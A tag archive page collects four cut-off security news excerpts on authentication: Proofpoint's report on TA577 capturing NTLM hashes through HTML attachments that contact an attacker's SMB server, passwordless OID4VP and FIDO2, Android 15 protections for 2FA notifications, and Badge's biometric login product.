Tag Archive for: Authentication

TA577 Exploits NTLM Authentication Vulnerability


Cybersecurity researchers at Proofpoint have uncovered a new tactic employed by cybercriminal threat actor TA577, shedding light on a lesser-seen objective in their operations. 

The group was found utilizing an attack chain aimed at stealing NT LAN Manager (NTLM) authentication information. This method could potentially be exploited for sensitive data gathering and facilitating further malicious activities.

In an analysis published earlier today, the Proofpoint team identified at least two campaigns conducted by TA577 on February 26 and 27 2024 employing this technique. 

These campaigns targeted hundreds of organizations globally, sending out tens of thousands of messages. The messages were designed to appear as replies to previous emails, a tactic known as thread hijacking, and contained zipped HTML attachments.

Each attachment had a unique file hash, and the HTML files within were tailored to specific recipients. Upon opening, these files initiated a connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. This connection was designed to reach an external SMB resource controlled by the threat actor, aiming to capture NTLM hashes.

Proofpoint’s analysis did not detect any malware delivery from these URLs. Instead, researchers concluded that TA577’s objective was to capture NTLMv2 challenge/response pairs to steal NTLM hashes, based on the characteristics of the attack chain and tools used.

The stolen NTLM hashes could potentially be exploited for password cracking or to facilitate “Pass-The-Hash” attacks within targeted organizations. Indicators suggest the use of the open-source toolkit Impacket on the SMB servers, a practice uncommon in standard SMB environments.

Read more on Pass-The-Hash attacks: Microsoft Fixes Two Zero-Day Bugs Used in Attacks

It’s worth noting that the delivery method used by TA577 – employing a malicious HTML file within a zip archive – is specifically designed to bypass security measures. Even disabling guest access to SMB does not mitigate the attack, as the file attempts to authenticate to the external SMB server.

“Proofpoint researchers have also seen an increase…

Source…

The Evolution of Authentication with OIDC4VP and FIDO2


When was the last time you struggled to remember a password? The answer is perhaps one too many times. In today’s digital age, our data consumption is skyrocketing, bringing with it increased risks. Traditional password-based authentication systems are falling short against sophisticated cyber threats. That’s why the move to passwordless authentication options like OID4VP and FIDO2 is critical for both businesses and users.

Let’s dive into understanding how these new authentication solutions tackle the vulnerabilities of traditional password systems and provide a comparison between them.

Passwordless Authentication: A Paradigm Shift with OID4VP and FIDO2

The inconvenience and risks associated with passwords, including phishing attacks and stolen credentials, are well-known. Hence, passwordless authentication emerges as a relief for consumers, who now do not have to bother with remembering and storing hundreds of account credentials. This approach enables users to verify their identity seamlessly and securely through biometric factors or one-time codes, eliminating the reliance on traditional passwords. One important protocol in this domain is OpenID for Verifiable Presentations (OID4VP), which offers a standardised method for secure verification, thereby reducing the risks.

image

OpenID for Verifiable Presentations (OID4VP) functions by extending the OpenID Connect protocol, supporting the presentation of claims through Verifiable Credentials. This extension enables the secure and verifiable presentation of identity data within the protocol flow.

With OID4VP, users can present their digital proofs of identity, attributes, or qualifications to verifiers, using a wallet. OID4VP uses Verifiable Presentations (VPs) which are cryptographic confirmations of digital identity based on well-known standards for authentication and authorisation on the web, such as OAuth 2.0 and OpenID Connect.

Apart from OID4VP, FIDO2 (Fast Identity Online) also presents developers with an alternative for securing users’ digital interactions.

FIDO2 is a collaborative initiative by the FIDO Alliance and the World Wide Web Consortium (W3C) aimed at…

Source…

Android 15 Could Offer a Boost to Two-Factor Authentication Security to Keep User Data Safe: Report


Android 15 is still under development, but on Friday, February 16, Google released the first Developer Preview of the upcoming operating system. The tech giant said that the new Android software will largely focus on security, and a new report claims to have found three new ways it will make your smartphone and your sensitive data more secure. According to it, Android 15 will be able to better protect the notifications that arise from two-factor authentications (2FA) so that a malicious app or malware cannot access it to steal user data.

According to a report by Android Authority’s Mishaal Rahman, Android 15 will be implementing new ways to cover the gaps left behind by its predecessors. Currently, most two-factor authentication methods for social media profiles, emails, and banking apps use SMS to send a one-time password (OTP). However, there is a risk if a malicious third-party app can read this notification and use it to hack into sensitive data or get into your banking apps and steal money.

To reduce the risk, Google has already begun placing strings of codes in the current edition of the OS. The report found a line of code in the Android 14 QPR3 Beta 1 update that mentions a new permission named RECEIVE_SENSITIVE_NOTIFICATIONS. This permission comes with a higher protection level and can only be given to apps that Google personally verifies. The exact role of this permission is not known but given its naming, it appears to deal with a special category of notifications that will not be accessible for third-party apps to read.

The report highlights that it is likely aimed at 2FA-related notifications. The belief comes from a separate string of code found by Rahman, which points to an under-development platform feature, to which the permission is tied. The feature is named NotificationListenerService and it is an API that lets apps read or take action on notifications. A general use case would be how many apps ask for access to notifications to auto-fill OTP when creating a new account. However, once this API becomes active (it isn’t in the Android 14 build), this will get more difficult.

This API will require the user to enter Settings and then manually grant permission to apps…

Source…

No secrets or stored credentials with Badge’s new authentication system


Badge Inc., a digital privacy firm founded by MIT cryptographers, is celebrating the launch of its patented authentication software, which allows users to enroll once and authenticate across devices thereafter without re-registration. According to a press release, the biometric public key system is easily integrated with leading digital identity providers, and eliminates the risk of centrally stored personal identity information and biometric data being exposed to breaches, thus rendering passwords, knowledge-based authentication (KBA) and biometric credential storage obsolete.

“The problem of storing credentials has vexed the security community for decades,” says Ray Rothrock, Badge advisor, venture capitalist and former CEO of Red Seal. According to Badge, by doing away with stored credentials the system eliminates the target of 49 percent of all data breaches. “The pervasive concern of PII being in the open and unprotected is over,” says Rothrock. “Badge enables identity without secrets.”

The product does so by letting users derive private keys on the fly using their biometrics and factors of choice, without having to rely on hardware tokens or secrets. It also dodges the problem of on-device authentication that locks users to a specific device that can be lost or rendered inoperable, leading to cumbersome account recovery processes. Per the release, users enroll once then “seamlessly authenticate across any device using authentication factors that are unique and inherent to them, including biometric factors such as fingerprint or face. These biometric factors can be combined with other factors such as passive attributes, attestation signals, PINs, etc.,” for an MFA method that does not rely on a specific device or token.

“You are your token”

Tina P. Srivastava, co-founder of Badge and an MIT aerospace PhD, says Badge’s core mission is to move the trust-anchor for digital identities to the human instead of hardware. “After losing my own identity in a breach,” says Srivastava, “we went back to the fundamentals. We relied on math to solve the problem and used cryptography to build a user-centric solution that makes people their own…

Source…